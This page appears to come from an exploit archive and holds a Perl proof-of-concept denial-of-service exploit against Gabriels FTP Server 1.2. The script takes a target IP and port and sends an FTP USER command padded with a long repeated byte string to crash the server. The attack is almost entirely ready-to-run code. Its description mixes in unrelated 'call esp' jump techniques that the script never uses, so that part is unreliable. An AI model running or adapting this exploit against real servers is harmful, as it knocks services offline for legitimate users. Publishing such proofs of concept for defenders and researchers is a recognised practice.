Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Gabriels FTP Server 1.2 Denial Of Service[6]
- Authored by Fernando Mengali[7]
-
Gabriels FTP Server version 1.2 remote denial of service exploit.
- SHA-256 |
94cd777c76d11157e95fbe2a87214b8bdb3d3e211ef5db4fc6e44042f8dea1bc
- Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
#!/usr/bin/perl
use IO::Socket::INET;
# Exploit Title: Gabriels FTP Server 1.2 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 25 january 2024
# Vendor Homepage: N/A
# Download to demo: https://drive.google.com/file/d/1k8QxfP6x908E-1QpRAVulKoAM9OEo1a8/view?usp=sharing
# Notification vendor: No reported
# Tested Version: Gabriels FTP Server 1.2
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Vídeo: https://www.youtube.com/watch?v=wwHuXfYS8yQ
#1. Description
#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.
#When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.
#2. Proof of Concept - PoC
$sis="$^O";
if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}
system("$cmd");
intro();
main();
print "[+] Exploiting... \n";
my $payload = "\x41\x2C\x41\x20\x42"x500;
my $ftp_socket = IO::Socket::INET->new(
PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp',
Timeout => '10',
) or die "Não foi possível se conectar ao servidor.";
my $response = <$ftp_socket>;
print $ftp_socket "USER $payload\r\n";
print "[+] Done - Exploited success!!!!!\n\n";
sub intro {
print "######################################################################\n";
print "# Gabriels FTP Server 1.2 - Denied of Service #\n";
print "# #\n";
print "# Coded by Fernando Mengali #\n";
print "# #\n";
print "# e-mail: fernando.mengalli\@gmail.com #\n";
print "# #\n";
print "######################################################################\n";
}
sub main {
our ($ip, $port) = @ARGV;
unless (defined($ip) && defined($port)) {
print " \nUsage: $0 <ip> <port> \n";
exit(-1);
}
}
#3. Solution/ How to fix:
# This version product is deprecated
File Tags
- ActiveX[18] (932)
- Advisory[19] (83,844)
- Arbitrary[20] (16,493)
- BBS[21] (2,859)
- Bypass[22] (1,806)
- CGI[23] (1,031)
- Code Execution[24] (7,507)
- Conference[25] (685)
- Cracker[26] (843)
- CSRF[27] (3,365)
- DoS[28] (24,196)
- Encryption[29] (2,377)
- Exploit[30] (52,438)
- File Inclusion[31] (4,241)
- File Upload[32] (982)
- Firewall[33] (822)
- Info Disclosure[34] (2,819)
- Intrusion Detection[35] (902)
- Java[36] (3,111)
- JavaScript[37] (883)
- Kernel[38] (6,882)
- Local[39] (14,615)
- Magazine[40] (586)
- Overflow[41] (12,926)
- Perl[42] (1,428)
- PHP[43] (5,166)
- Proof of Concept[44] (2,358)
- Protocol[45] (3,675)
- Python[46] (1,583)
- Remote[47] (31,183)
- Root[48] (3,609)
- Rootkit[49] (517)
- Ruby[50] (615)
- Scanner[51] (1,646)
- Security Tool[52] (7,947)
- Shell[53] (3,224)
- Shellcode[54] (1,216)
- Sniffer[55] (898)
- Spoof[56] (2,235)
- SQL Injection[57] (16,467)
- TCP[58] (2,420)
- Trojan[59] (687)
- UDP[60] (896)
- Virus[61] (667)
- Vulnerability[62] (32,295)
- Web[63] (9,811)
- Whitepaper[64] (3,763)
- x86[65] (966)
- XSS[66] (18,086)
- Other[67]
File Archives
- January 2024[68]
- December 2023[69]
- November 2023[70]
- October 2023[71]
- September 2023[72]
- August 2023[73]
- July 2023[74]
- June 2023[75]
- May 2023[76]
- April 2023[77]
- March 2023[78]
- February 2023[79]
- Older[80]
Systems
- AIX[81] (429)
- Apple[82] (2,049)
- BSD[83] (375)
- CentOS[84] (57)
- Cisco[85] (1,926)
- Debian[86] (6,951)
- Fedora[87] (1,693)
- FreeBSD[88] (1,246)
- Gentoo[89] (4,425)
- HPUX[90] (880)
- iOS[91] (366)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (69)
- Linux[95] (48,302)
- Mac OS X[96] (691)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (487)
- RedHat[100] (14,893)
- Slackware[101] (941)
- Solaris[102] (1,611)
- SUSE[103] (1,444)
- Ubuntu[104] (9,232)
- UNIX[105] (9,356)
- UnixWare[106] (187)
- Windows[107] (6,620)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]